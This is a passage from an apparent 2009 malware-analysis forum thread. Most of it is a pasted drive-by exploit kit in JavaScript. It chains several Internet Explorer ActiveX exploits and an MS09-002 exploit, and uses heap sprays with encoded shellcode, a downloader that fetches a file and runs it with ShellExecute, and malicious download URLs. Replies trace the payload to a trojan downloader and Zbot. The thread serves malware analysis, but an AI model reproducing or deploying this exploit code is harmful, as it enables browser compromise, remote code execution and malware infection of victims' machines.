catch(e){try{nl=CreateO(a,"MSXML2.XMLHTTP");nl.open("GET",eurl,false);}

catch(e){try{nl=CreateO(a,"MSXML2.ServerXMLHTTP");nl.open("GET",eurl,false);}

catch(e){try{nl=new XMLHttpRequest();nl.open("GET",eurl,false);}

catch(e){return 0;}}}}

x.Type=1;

nl.send(null);

rb=nl.responseBody;

x.Open();

x.Write(rb);

x.SaveTofile(fname,2);

sap.ShellExecute(fname);

return 1;

}



// Stage machine driven by sleep()'s eval: attack(1) -> 4 -> 3 -> 7 -> 9 -> 10.
// Each stage uses cobj() to check that its target exists, sprays via
// ms("&spl=N") so the callback URL reveals the stage, triggers, and schedules
// the next stage 2 s later; when the target is absent it moves on after 1 ms.
// Every trigger is wrapped in try/catch(e){} so failures are silent.
function attack(s){

var obj=null;



if(s==1){
// Stage 1: walk a list of CLSIDs; for each control that instantiates and
// hands script a Shell.Application via CreateO(), call Go() to download and
// run the payload. No heap spray here - this path relies on controls that
// expose object creation to script. The CLSIDs are kill-bit candidates.

var i=0;

var target=new Array("BD96C556-65A3-11D0-983A-00C04FC29E36","BD96C556-65A3-11D0-983A-00C04FC29E30","AB9BCEDD-EC7E-47E1-9322-D4A210617116","0006F033-0000-0000-C000-000000000046","0006F03A-0000-0000-C000-000000000046","6e32070a-766d-4ee6-879c-dc1fa91d2fc3","6414512B-B978-451D-A0D8-FCFDF33E833C","7F5B7F63-F06F-4331-8A26-339E03C0AE3D","06723E09-F4C2-43c8-8358-09FCD1DB0766","639F725F-1B2D-4831-A9FD-874847682010","BA018599-1DB3-44f9-83B4-461454C84BF8","D0C07D56-7C69-43F1-B4A0-25F5A11FAB19","E8CCCDDF-CA28-496b-B050-6C07C962476B",null);

while(target[i]){

var a=null;

a=document.createElement("object");

a.setAttribute("classid","clsid:"+target[i]);

if(a){try{var b=CreateO(a,"Shell.Application");if(b){Go(a);}}catch(e){}}

i++;

}

sleep("attack(4);",4000);

return 0;

}



if(s==3){
// Stage 3: WebViewFolderIcon.WebViewFolderIcon.1. Sprays at &spl=8, then
// 128 rounds of setSlice(0x7ffffffe,0,0,202116108); 202116108 is
// 0x0c0c0c0c, the spray target address.

try{

obj=cobj("WebViewFolderIcon.WebViewFolderIcon.1");

if(obj){

ms("&spl=8");

for(var i=0;i<128;i++){

var wvfio=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");

try{wvfio.setSlice(0x7ffffffe,0,0,202116108);}catch(e){}

var wvfit=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");

}

sleep("attack(7);",2000);

return 0;

}

}catch(e){}

sleep("attack(7);",1);

return 0;

}



if(s==4){
// Stage 4: CLSID EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F. Sprays at &spl=9,
// then reads document.scripts[0].createControlRange().length. The Math.ceil
// line is a no-op; `z` is an implicit global.

try{

obj=cobj("{EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F}");

if(obj){

ms("&spl=9");

z=Math.ceil(0x0c0c0c0c);

z=document.scripts[0].createControlRange().length;

sleep("attack(3);",2000);

return 0;

}

}catch(e){}

sleep("attack(3);",1);

return 0;

}



if(s==7){
// Stage 7: CLSID 77829F14-D911-40FF-A2F0-D11DB8D6D0BC. Sprays at &spl=10,
// then calls SetFormatLikeSample() with a 5000-char \x0c string.

try{

obj=cobj("{77829F14-D911-40FF-A2F0-D11DB8D6D0BC}");

if(obj){

ms("&spl=10");

var buf = "";

while (buf.length < 5000) buf += "\x0c\x0c\x0c\x0c";

obj.SetFormatLikeSample(buf);

sleep("attack(9);",2000);

return 0;

}

}catch(e){}

sleep("attack(9);",1);

return 0;

}



if(s==9){
// Stage 9: DirectAnimation.PathControl. Sprays at &spl=11, then uses the
// init/flush/alloc/alloc_str/free helpers to place the `vtable` string
// (first entry addr(0x7ceb9090), the remaining 31 entries 0x0c0c0c0c) and
// the `fakeObjChunk` string (which embeds addr(fakeObjPtr), computed from
// heapBase) before calling KeyFrame(0x40000801, ...). `i` is re-declared
// with var several times here, which is harmless in function scope.

try{

obj=cobj("DirectAnimation.PathControl");

if(obj){

ms("&spl=11");

init();

var jmpecx = 0x0c0c0c0c;

var vtable = addr(0x7ceb9090);

for (var i = 0; i < 124/4; i++)vtable += addr(jmpecx);

vtable += padding.substr(0, (1008-138)/2);

var fakeObjPtr = heapBase + 0x688 + ((1008+8)/8)*48;

var fakeObjChunk = padding.substr(0, (0x200c-4)/2) + addr(fakeObjPtr) + padding.substr(0, 14/2);

CollectGarbage();

flush();

for (var i = 0; i < 100; i++)alloc_str(vtable);

alloc_str(vtable, "lookaside");

free("lookaside");

for (var i = 0; i < 100; i++)alloc(0x2010);

for (var i = 0; i < 2; i++) {

alloc_str(fakeObjChunk);

alloc_str(fakeObjChunk, "freeList");

}

alloc_str(fakeObjChunk);

free("freeList");

obj.KeyFrame(0x40000801, new Array(1), new Array(1));

sleep("attack(10);",2000);

return 0;

}

}catch(e){}

sleep("attack(10);",1);

return 0;

}

if(s==10){
// Stage 10: hand off to snpac() (no spray; see below). End of the chain.

snpac();

return 0;

}

}function xml(){
// Sprays 100 blocks of 0x0a0a filler (grown to 0xd0000 units) + shellcode,
// then writes an XML data island with DATASRC/DATAFLD bindings into the
// element with id "cmpjoqjukl", which is not part of the visible code
// (presumably in the host HTML). `memory` and `i` are implicit globals.
// Not invoked from the visible code.

var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u0035");

var spray = unescape("%u0a0a%u0a0a");

do { spray += spray; } while(spray.length < 0xd0000);

memory = new Array();

for(i = 0; i < 100; i++){ memory[i] = spray + shellcode; }

document.getElementById("cmpjoqjukl").innerHTML = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";

}function pdf(){
// Writes an <embed> for http://Usrv04.ru/pdf.php?id=2690 into the element
// with id "yliljaha". The catch branch does exactly the same, so the PDF is
// served whether or not an Acrobat control (AcroPDF.PDF / PDF.PdfCtrl) was
// found. Not invoked from the visible code.

try {

var obj = null;

obj = new ActiveXObject("AcroPDF.PDF");

if (!obj) {obj = new ActiveXObject("PDF.PdfCtrl");}

if (obj) {document.getElementById("yliljaha").innerHTML = "<embed width='150' height='150' src='http://Usrv04.ru/pdf.php?id=2690' type='application/pdf'></embed>";}

} catch(e) {

document.getElementById("yliljaha").innerHTML = "<embed width='150' height='150' src='http://Usrv04.ru/pdf.php?id=2690' type='application/pdf'></embed>";

}

}function snpac(){
// CLSID F0E42D50-368C-11D0-AD81-00A0C90DC8D9. No spray: sets SnapshotPath
// to the infect.php URL (&spl=4) and CompressedPath to a local .exe path,
// then calls PrintSnapshot() - i.e. it relies on the control's own
// fetch-to-disk behaviour.

var buf1 = 'http://Usrv04.ru/infect.php?id=2690&spl=4';

try{

var obj = document.createElement('object');

obj.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');

obj.setAttribute("id", "obj");

obj.SnapshotPath = buf1;

obj.CompressedPath = 'C:\NOFCym2lizm5Rw35.exe';

obj.PrintSnapshot();

} catch(e) {}

}function MS09002(){
// Named for the bulletin it targets. Sprays (ret-0x40000)/0x40000 chunks of
// 0x0c0c filler + payload, each sized to 0x40000 bytes, then clones a
// <table>, clears the original's attributes, drops it, forces IE's
// CollectGarbage(), creates an <img> whose src starts with 0x0c0c, and reads
// obj_cp.click (a property access, not a call). `heap_chunks` and
// `heap_chunks_num` are implicit globals. Not invoked from the visible code.

var payload = unescape('%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3631');



var ret = 0x0c0c0c0c;

var heap_chunk_size = 0x40000;



var nopsled_size = heap_chunk_size - (payload.length * 2)

var nopsled = unescape('%u0c0c%u0c0c');

while (nopsled.length < nopsled_size){

   nopsled += nopsled;

}

heap_chunks = new Array();

heap_chunks_num = (ret - heap_chunk_size)/heap_chunk_size;

for (var i = 0 ; i < heap_chunks_num ; i++) {

   heap_chunks[i] = nopsled + payload;

}

var obj = document.createElement('table');

obj.click;



var obj_cp = obj.cloneNode();

obj.clearAttributes();

obj = null;



CollectGarbage();



var img = document.createElement('img');

img.src = unescape('%u0c0c%u0c0cCCCCCCCCCCCCCCCCCCCCCC');



obj_cp.click;

} attack(1); // Entry point: the attack() stage chain starts immediately on load.

RunACX(10);  // The ActiveX batch follows from 11 s onward, one control per second.

June 05, 2009, 04:54:52 pm
Reply #1

SysAdMini

Those exploits download a trojan downloader from

Usrv04.ru/infect.php?id=2690&spl=4
http://www.virustotal.com/analisis/227f17fc312900ab70f7664f0ee835c141302388168a44022b57d79d775945e0-1244220133

It downloads a Zbot trojan from
olikar.ru/exe/troj.exe
http://www.virustotal.com/analisis/7bae8ae128446cf7a0663359d3719355b3aaf14407f7bccf8ab08a41c5680f03-1244220811

Joebox report attached

June 05, 2009, 05:51:10 pm
Reply #2

MysteryFCM


June 05, 2009, 05:59:56 pm
Reply #3

SysAdMini
